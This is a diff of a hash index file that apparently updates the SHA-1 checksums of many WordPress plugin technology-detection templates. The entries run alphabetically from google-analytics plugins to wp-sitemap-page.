-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:95497f964f2c6976ae6fdca33d1deb35d735106d -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:79e3969d0870bc972a16777171b779f4e8859e9c -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:3b8769f804c97d2075269074988fa39165057f90 -http/technologies/wordpress/plugins/google-site-kit.yaml:253ea53fb823e9eb0985d9694e723090e3e385a2 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:556ed103694802f82c557ec0cf6429d1ad21bbd8 -http/technologies/wordpress/plugins/gtranslate.yaml:d333346ec773bf93f43bf2e063811902f8769c84 -http/technologies/wordpress/plugins/gutenberg.yaml:fa0e3a7dde89c83a3a9035ef0320510c721dc076 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:359cc9c0bd85a9dfb18e54a18e543e900d454384 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:2ce79134ffd98a0c7bb988b09009dc18a4677a90 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:3a9e37a1053b5e717e0e624c9105b08b4cb8fab6 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:840df111718eca093cc89285d92993845a64f6cc -http/technologies/wordpress/plugins/header-footer.yaml:5dd243c4b1245353f31c86f50765c25a7a84af6d -http/technologies/wordpress/plugins/health-check.yaml:55dd7a3c58885aa78213bc1eaed1c83905dcd618 -http/technologies/wordpress/plugins/hello-dolly.yaml:38549911a03e61dcae225a1c4c292074dd1fbae9 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:c92ea65cc7c694d4c93709a7a96c0182a283baa9 -http/technologies/wordpress/plugins/hostinger.yaml:d6931dea9264af3dee4a904c496bbc194e8f48ba -http/technologies/wordpress/plugins/image-optimization.yaml:4a49699c8963b05db30ca7c5a8740b24e4b0d2ca -http/technologies/wordpress/plugins/imagify.yaml:9f9cd9a136ea1e01027fbe62c71956a34fdf3fa5 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:1c6be6bc344e532324a2ddd3909f1a894db83bd8 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff http/technologies/wordpress/plugins/imsanity.yaml:319c06bed3d7611b6a05e2aaa77fb998a3205778 http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml:7544703f23942190d32f575fe3f4b1398dfa3260 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:951a34b87c2885e6c30573fe746c7adf03f59ad7 -http/technologies/wordpress/plugins/instagram-feed.yaml:ed9e0883b47549e2d5160f16cd24a30c0b594fad -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:3a9a3e681222a0cf404bc855d26eae0a164c6200 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:db91aa9879c381bfd6f06b0145890499a9c584ad -http/technologies/wordpress/plugins/jetpack.yaml:bd689f87e9883fb948c8a0ef2c35a2ab67756f29 -http/technologies/wordpress/plugins/kadence-blocks.yaml:254dff22e9483f968e1aab30d75e29d109b54e45 -http/technologies/wordpress/plugins/kirki.yaml:3e378c7b547221102411bf2ee9c264dcec416275 -http/technologies/wordpress/plugins/leadin.yaml:c9cbde3f31a1751e5dbe4a078ce79d0c78d07441 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:275de54e643e6ccf309c75e39686a90ae142b6ee -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7948434f380d1588f120746848c19bc46c4318bc -http/technologies/wordpress/plugins/litespeed-cache.yaml:f2b73fd30a451e343a6e6cbdfa1b4afcb1eb601c -http/technologies/wordpress/plugins/loco-translate.yaml:d7a24d51f76789c52ec7b143346fbc9d7e725021 -http/technologies/wordpress/plugins/loginizer.yaml:69d2d5c312c230c344ffae5fb528db3dc9baee5a +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:2ab988ce57a0f57fd453e1e23c785f757b4440b6 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:adff38da0c70eac67ca7386343334a62bfbc54d3 -http/technologies/wordpress/plugins/mailpoet.yaml:5fb2f2b5a9bc1cceb285679bd7bb1bd13433f638 -http/technologies/wordpress/plugins/maintenance.yaml:3c35803420907bb64ef937128e921005bef3816a -http/technologies/wordpress/plugins/mainwp-child.yaml:508d3ee9de4ae79b3489b87a5e5778668764898e -http/technologies/wordpress/plugins/malcare-security.yaml:1b7decb10134e5305fff44f7b609780fb4ef8f61 -http/technologies/wordpress/plugins/megamenu.yaml:53a9864c078b330b9ab3040673437121acce61c7 -http/technologies/wordpress/plugins/members.yaml:2f7179a199387f55fda03d4c1d5647d862ad7b7c -http/technologies/wordpress/plugins/meta-box.yaml:c0a95b3adabde6c997dbaed5e2c158bea02b73df -http/technologies/wordpress/plugins/metform.yaml:6c775f06e86f78ab75c11ae4f476dce3fa5d9572 -http/technologies/wordpress/plugins/ml-slider.yaml:06c781352dc031bb1ce860b95a8b7c01904ebc4e -http/technologies/wordpress/plugins/newsletter.yaml:21e8af44fce527dbb668efa460ef42b6c6f3004f -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:1aff7b61f63c149e743e78d869724ea8e3f8507e -http/technologies/wordpress/plugins/nextgen-gallery.yaml:9e1e032419c364bd8f2f11f5075df911a88fa4af -http/technologies/wordpress/plugins/ninja-forms.yaml:ab5174dc1ccf9970ce8986d403a17d7057cde392 -http/technologies/wordpress/plugins/ocean-extra.yaml:99f84752a83ba520751dbdddd441aed5eddb318d -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:2a8bd9cec798c6f7ed95321c7b5a781956e57914 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:05c0d6e753a5ece8c5c93c04cd4dbf36202d50d9 -http/technologies/wordpress/plugins/optinmonster.yaml:5addb3da2b4969dc69ef827d724c24b0fcac3e0b -http/technologies/wordpress/plugins/otter-blocks.yaml:8784ec0ebbb9d17db100401ad7ea8a9a68731c70 -http/technologies/wordpress/plugins/password-protected.yaml:82c97799403ceaf274a2ea14ebaf5cd3bdfb21bd -http/technologies/wordpress/plugins/pdf-embedder.yaml:48da9e25f12c2da6d603792d3358009e5283434d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:c274f39e569adf0c41b69c94e3e3d6cf50b43817 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:2fb6e282504f3ab516bf8dda5fa84624bec49aea +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:e805aa0f24118a419ba698e01f4040c3e021358d +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:7ae7f748295d77b64260d2b1ab02759d0a287a69 -http/technologies/wordpress/plugins/pixelyoursite.yaml:84275bef57b39fb334777c2d5d58bbb9d10c783e -http/technologies/wordpress/plugins/polylang.yaml:989c458f8d4af44157ccefede2561aa11ceb48e3 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:af608daa92ff4482633729e9eee2b6029f704b5d -http/technologies/wordpress/plugins/post-smtp.yaml:54ef33676b42206f7ab7ae4873a16a39659c5da4 -http/technologies/wordpress/plugins/post-types-order.yaml:c343d8a1ae322d053d84944f2d4b8d99650176d5 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:373a31f876b2a65b64082ffad1a6edf19229c830 -http/technologies/wordpress/plugins/pretty-link.yaml:467b7b29868c3e3ee0aaa38a09ca3e5ca1028ca2 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:b6b3a3fbecbc7e89bab7f99e4c61f0b55c5f03c9 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:4d5252fd89c108932529b22de94c666d84f6b273 -http/technologies/wordpress/plugins/redirection.yaml:1bab1a20b9fdd244c46bb287285e5f48b92eda17 -http/technologies/wordpress/plugins/redux-framework.yaml:44d143b9cebdb45a1b4968ba72a3d3b348f6a7da -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:342babc4c8634d30fa42f511d8a12fd3b47caa1e -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:a5f2aeac25f05f4f822402be5893ae517ad11191 -http/technologies/wordpress/plugins/safe-svg.yaml:6dfccda5682560d3c86085b4cf41b5f0feb24e33 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:01026da6fe426ebe97c359fecb4cbf207990258c -http/technologies/wordpress/plugins/sg-cachepress.yaml:1864e29e5010eccadf3d6b6994df546ffcab63c0 -http/technologies/wordpress/plugins/sg-security.yaml:7df5c0dd3371d65b6cdbda55015e9d45d56062b5 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:c1bd0fc6c3c4f1f8dc9277c3f6fc7ffe3b52b693 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:62050c642f9e79a75c366a084aa30b7219426a2d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:67aecc68b838d0d03249b6e0315b8c5d85640eb2 -http/technologies/wordpress/plugins/simple-history.yaml:cb0836faf80b63de39d1f5b73a36e41e4dbf5ad1 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:020ac98ee8b37e204e0935108f9d69e52db78397 +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:dab955108151069815f7ca5f93fc36e8f21eec7f -http/technologies/wordpress/plugins/siteorigin-panels.yaml:2815140719c2f91ec20f7dc1dc8755eed71566b0 -http/technologies/wordpress/plugins/smart-slider-3.yaml:0f81f0a409e281d95f59dace51d784b5cf299402 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:d98cc7a116d1142c88c0f1d4eb02bacdf391c68f +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:1b506638fa568e33eb4b4d431ac50441e4d2f943 +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:67036719b530eae2b46449d26223ef37787007ad -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:e6a289e18ea810493ce899110aab37d3a04c596c -http/technologies/wordpress/plugins/sucuri-scanner.yaml:1862f4a2b28da45c227ebb785b264883357cc877 -http/technologies/wordpress/plugins/svg-support.yaml:9505619c97fe88c313eaaba4af5f8819aef54e64 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 http/technologies/wordpress/plugins/table-of-contents-plus.yaml:142cf7dc3d34ed35422ad91447b3f1f986d965b6 -http/technologies/wordpress/plugins/tablepress.yaml:ed67150aff573073ada9b9f047ce20816224d468 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:73289b9f6b7137e6648d4479bc83ba919d3a0798 -http/technologies/wordpress/plugins/templately.yaml:d966a1374f24e1c91b7ce616c86e8e972a73efb4 -http/technologies/wordpress/plugins/the-events-calendar.yaml:01deb46f69a657b2e5fe93e0ad820f7e5c3e625d +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:4ea5d3fa654355fdf809c041b53f3d260992efe8 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:642537aaf6a36017d61dd13f70c512d28cbc5ea7 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:0268df7e9b8c304886e91f305c99be09f63b5b6f -http/technologies/wordpress/plugins/under-construction-page.yaml:5c733c7215e17dba97d0d4a5b0f774aa6f408128 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:dee2da64021b2470bd01a6cbafca4ff6b96e7604 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:d4e16a20ee9131765fa4c90db6432e527ae17316 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:0ee2b559398976d743a955a70dcf247f92d1b082 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:c0c162c255af64c980918e45392d907e84e39f06 -http/technologies/wordpress/plugins/webp-express.yaml:9949e1c257127f00ebca652e80aecf6e859c7bca +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 http/technologies/wordpress/plugins/widget-importer-exporter.yaml:6704a9b4d0dcda2afcbac6ec83aab1e38ff1f0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6cb2fb0efbb91a15a17df9fe8905ebae3bffceb4 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:34f122f8fbe94d9218379925b45b284a965d3d41 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 http/technologies/wordpress/plugins/woo-inpost.yaml:ccc431985c9227d06dce6cd78efea4b46ddf791c -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:914519caea8814cf19f349d862da3728fd62e9c4 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:3de6f1fa956f3107124440917df31d39834414d0 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:26282c77f9f34bf9c680dfb465cecbd92c294628 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d44efdd852f1ef72ce3281dc2b7765bd07bb2c4d -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:1eb4f6cfd6bb241478a374deda5b3fc0574d0ced -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:6da5522b5ea2603e50f38903ba4b31bdad100813 -http/technologies/wordpress/plugins/woocommerce-services.yaml:6a8d00096a3b8297a775d9601954066bcb018177 -http/technologies/wordpress/plugins/woocommerce.yaml:cb414ba0ddb0684ce346de7e8df338b4a902768d -http/technologies/wordpress/plugins/wordfence.yaml:77bcbd28c475aeda6756ab3cd81247deac8fd87b -http/technologies/wordpress/plugins/wordpress-importer.yaml:bb8ee2dcce8e6da2a420bc4e36b3fee9faad8144 -http/technologies/wordpress/plugins/wordpress-seo.yaml:d767ab512b5f28f52130cc8afada2d272297dabd +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:55571a65dd3d5dd636931ba979d076ebd8e8c766 -http/technologies/wordpress/plugins/wp-crontrol.yaml:586325872ddaf9e3c05109fa32383f8940a07e49 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:335e7344857a8848248c0271bbc04adebe3d4d37 -http/technologies/wordpress/plugins/wp-file-manager.yaml:7ac74777fe13114ed754e8ca1e04e32787130c6a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c17e09e1140886696bd0c619fc34f468b54928f0 -http/technologies/wordpress/plugins/wp-mail-logging.yaml:793a3daa98dfce1e73221e17aea38c68620ffea7 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:52fd6bed3d3053a25e37401a7e48798b11c13287 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:5f995d5a765399422f41a303dfc10564554f5194 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-logging.yaml:43cc5e8e1534e83039984a4f1affb3c2552fe63f +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:10b7d3c96ef44d16cc9ab5da9eeed5395f11396d http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:cff6f17259f5111006d99d2e806252e08ea7f24e -http/technologies/wordpress/plugins/wp-optimize.yaml:a9bb5b8abfeb704cbda31bea53252584c86c6713 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:4a7c415685c15b3ddcbf1ef5439546455c002c71 -http/technologies/wordpress/plugins/wp-reset.yaml:4b9ec2af37bdbc5fc96125709ef1c27857a514f1 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:bb14633c0b7a58edcc7b1184a18771eb237f8862 -http/technologies/wordpress/plugins/wp-rollback.yaml:90dfded8eaff3a5dcde798b4fea0a001cf7f82ba -http/technologies/wordpress/plugins/wp-seopress.yaml:71e1b086df225fa9ee199426dca167f882d60a9a -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:5bf17b89434109061a62517b8e4c9c3c087d30e1 -http/technologies/wordpress/plugins/wp-smushit.yaml:dcb60514f4ff63e3571f24eabdbe3ec0f9d5a9b9 -http/technologies/wordpress/plugins/wp-statistics.yaml:ae62acd8704c4706253e43c9c977678e13beb742 -http/technologies/wordpress/plugins/wp-super-cache.yaml:5d88c3626d62e3df359c7a8d26f4aafa06d1bf28 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 